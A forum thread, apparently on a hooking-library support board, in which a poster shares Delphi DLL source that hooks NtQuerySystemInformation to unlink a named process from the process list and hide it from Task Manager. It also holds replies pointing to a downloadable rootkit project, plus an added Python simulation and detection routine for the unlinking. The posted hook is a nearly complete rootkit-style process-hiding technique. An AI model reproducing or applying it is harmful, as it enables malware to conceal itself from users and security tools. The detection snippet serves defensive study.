Why doesn't this work?
HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
It says "Undeclared Identifier: NtQuerySystemInformation" for the first parameter.
I want to make a process invisible.
But don't think that it will be a virus. I just want to show my friend (a Delphi coder too) that it is possible to hide a process in the task manager. He says it's impossible.
But as I said, I won't abuse it. I read your license agreement and accepted it.
But well, shouldn't this work? It doesn't.
Library Proof;

uses windows, MadCodeHook;

var
  // Filled in by HookAPI with the address of the original NtQuerySystemInformation.
  NtQuerySystemInformationNextHook: function(
    SystemInformationClass: DWord;
    SystemInformation: Pointer;
    SystemInformationLength: ULong;
    ReturnLength: PULong): ULong; stdcall;

type
  IO_COUNTERS = record
    ReadOperationCount: Int64;
    WriteOperationCount: Int64;
    OtherOperationCount: Int64;
    ReadTransferCount: Int64;
    WriteTransferCount: Int64;
    OtherTransferCount: Int64;
  end;

  VM_COUNTERS = record
    PeakVirtualSize: ULONG;
    VirtualSize: ULONG;
    PageFaultCount: ULONG;
    PeakWorkingSetSize: ULONG;
    WorkingSetSize: ULONG;
    QuotaPeakedPagedPoolUsage: ULONG;
    QuotaPagedPoolUsage: ULONG;
    QuotaPeakNonPagedPoolUsage: ULONG;
    QuotaNonPagedPoolUsage: ULONG;
    PagefileUsage: ULONG;
    PeakPagefileUsage: ULONG;
  end;

  // One record of the SystemProcessInformation (class 5) buffer, as declared by the poster.
  SYSTEM_PROCESS = record
    NextEntryDelta: ULONG;        // byte offset from this record to the next; 0 = last record
    ThreadCount: ULONG;
    Reserved: array[0..5] of ULONG;
    CreateTime: LARGE_INTEGER;
    UserTime: LARGE_INTEGER;
    KernelTime: LARGE_INTEGER;
    ProcessName: PWideChar;
    BasePriority: DWORD;
    ProcessID: ULONG;
    InheritedFromProcessID: ULONG;
    HandleCount: ULONG;
    Reserved2: array[0..1] of ULONG;
    VmCounters: VM_COUNTERS;
    IoCounters: IO_COUNTERS;
    Threads: Pointer;
  end;
  PSYSTEM_PROCESS = ^SYSTEM_PROCESS;

// Replacement routine; it must use the same stdcall convention as the API it replaces
// (the NextHook variable above is already declared stdcall).
function NtQuerySystemInformationCallback(
  SystemInformationClass: DWORD;
  SystemInformation: Pointer;
  SystemInformationLength: ULONG;
  ReturnLength: PULONG): ULONG; stdcall;
var
  iChanged: Integer;
  pCurrent, pLast: PSYSTEM_PROCESS;
begin
  // Let the original API fill the caller's buffer first.
  result := NtQuerySystemInformationNextHook(
    SystemInformationClass,
    SystemInformation,
    SystemInformationLength,
    ReturnLength);
  iChanged := 0;
  if (result <> 0) then exit;                  // original call failed, nothing to filter
  if (SystemInformationClass <> 5) then exit;  // only SystemProcessInformation is touched
  pCurrent := PSYSTEM_PROCESS(SystemInformation);
  pLast := nil;
  // Walk the NextEntryDelta chain and unlink every record whose name matches.
  while (pCurrent <> nil) do
  begin
    if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then
    begin
      inc(iChanged);
      if (pLast <> nil) then
      begin
        // Make the previous record point past this one (or end the chain here).
        if (pCurrent.NextEntryDelta <> 0) then
        begin
          inc(pLast.NextEntryDelta, pCurrent.NextEntryDelta);
        end //NextEntryDelta <> 0
        else
        begin
          pLast.NextEntryDelta := 0;
        end //NextEntryDelta = 0
      end //pLast <> nil
      else
      begin
        // First record matched: this only moves the local copy of the
        // SystemInformation parameter; the caller's buffer pointer is unchanged.
        if (pCurrent.NextEntryDelta <> 0) then
        begin
          SystemInformation := Pointer(DWORD(SystemInformation) + pCurrent.NextEntryDelta);
        end
        else
        begin
          SystemInformation := nil;
        end;
      end; //pLast = nil
    end; //found our proc
    // pLast is only advanced while nothing has been unlinked yet.
    if (iChanged = 0) then
    begin
      pLast := pCurrent;
    end;
    // 32-bit pointer arithmetic (DWORD cast) to reach the next record.
    if (pCurrent.NextEntryDelta <> 0) then
    begin
      pCurrent := PSYSTEM_PROCESS(Pointer(DWORD(pCurrent) + pCurrent.NextEntryDelta));
    end
    else pCurrent := nil;
  end;
end;

begin
  //HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
  // HookAPI resolves the export by name, so no NtQuerySystemInformation declaration is needed.
  HookAPI('Ntdll.dll', 'NtQuerySystemInformation', @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
end.
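As an added defender-side example (not code from the original post or from madCodeHook), here is the NextEntryDelta chain walk the hook above manipulates, reduced to a constructed, simplified record layout in Python, together with a check that spots a record that was unlinked this way. It relies on the records sitting back to back in the buffer: a hop longer than the record it leaves, or a chain that ends before the buffer does, skips bytes, and those bytes hold the hidden record. The real SYSTEM_PROCESS_INFORMATION records also carry thread arrays and alignment padding, so a check on a real buffer must account for those sizes.

```python
import struct

# Constructed, simplified record layout (not the real SYSTEM_PROCESS_INFORMATION):
#   u32 NextEntryDelta | u32 ProcessId | u16 NameLen | UTF-16LE image name
HDR = struct.Struct("<IIH")

def build_buffer(procs):
    """Lay records back to back, chained by NextEntryDelta (0 ends the chain)."""
    chunks = []
    for i, (pid, name) in enumerate(procs):
        nm = name.encode("utf-16-le")
        nxt = HDR.size + len(nm) if i < len(procs) - 1 else 0
        chunks.append(HDR.pack(nxt, pid, len(nm)) + nm)
    return b"".join(chunks)

def walk(buf):
    """Follow the chain the way Task Manager does; returns [(offset, pid, name)]."""
    out, off = [], 0
    while True:
        nxt, pid, nlen = HDR.unpack_from(buf, off)
        out.append((off, pid, buf[off + HDR.size:off + HDR.size + nlen].decode("utf-16-le")))
        if nxt == 0:
            return out
        off += nxt

def simulate_hook_unlink(buf, pid):
    """What the posted hook does: bend the previous record's NextEntryDelta past
    the target (or to 0 if the target is last) so the chain walk never visits it."""
    buf = bytearray(buf)
    recs = walk(buf)
    for prev, cur in zip(recs, recs[1:]):
        if cur[1] == pid:
            nxt_prev = HDR.unpack_from(buf, prev[0])[0]
            nxt_cur = HDR.unpack_from(buf, cur[0])[0]
            struct.pack_into("<I", buf, prev[0], nxt_prev + nxt_cur if nxt_cur else 0)
    return bytes(buf)

def find_unlinked(buf):
    """Defender check: a hop longer than the record it leaves (or a chain that ends
    before the buffer does) skips bytes; parse those bytes as the hidden records."""
    hidden, off = [], 0
    while True:
        nxt, _pid, nlen = HDR.unpack_from(buf, off)
        gap, end = off + HDR.size + nlen, (off + nxt) if nxt else len(buf)
        while gap < end:  # every record lying inside the skipped span was unlinked
            _g, g_pid, g_nlen = HDR.unpack_from(buf, gap)
            hidden.append((g_pid, buf[gap + HDR.size:gap + HDR.size + g_nlen].decode("utf-16-le")))
            gap += HDR.size + g_nlen
        if nxt == 0:
            return hidden
        off += nxt
```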
Don't know, maybe "if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then" fails? Not sure whether NtQuerySystemInformation returns all caps.
Btw, you can hook NtQuerySystemInformation only with the commercial version of madCodeHook. This API is locked in the non-commercial version, so that virus/trojan programmers don't get tempted to misuse madCodeHook.
If you really want to hook NtQuerySystemInformation that much, visit http://iamaphex.net and download the file AFXRK2K4.zip. Inside is an EXE and a DLL Delphi project which hooks the above mentioned API. I tried it and it works. You can even inject it with madCodeHook. But please don't use it for ill purposes.
madCodeHook must be a better product, because madshi is selling it
I have implemented a little code hook:
www.arschvoll.net/myhook.txt
It should be able to hook NtQuerySystemInformation, but it's not recalculating a jump or call at the beginning of the hooked function.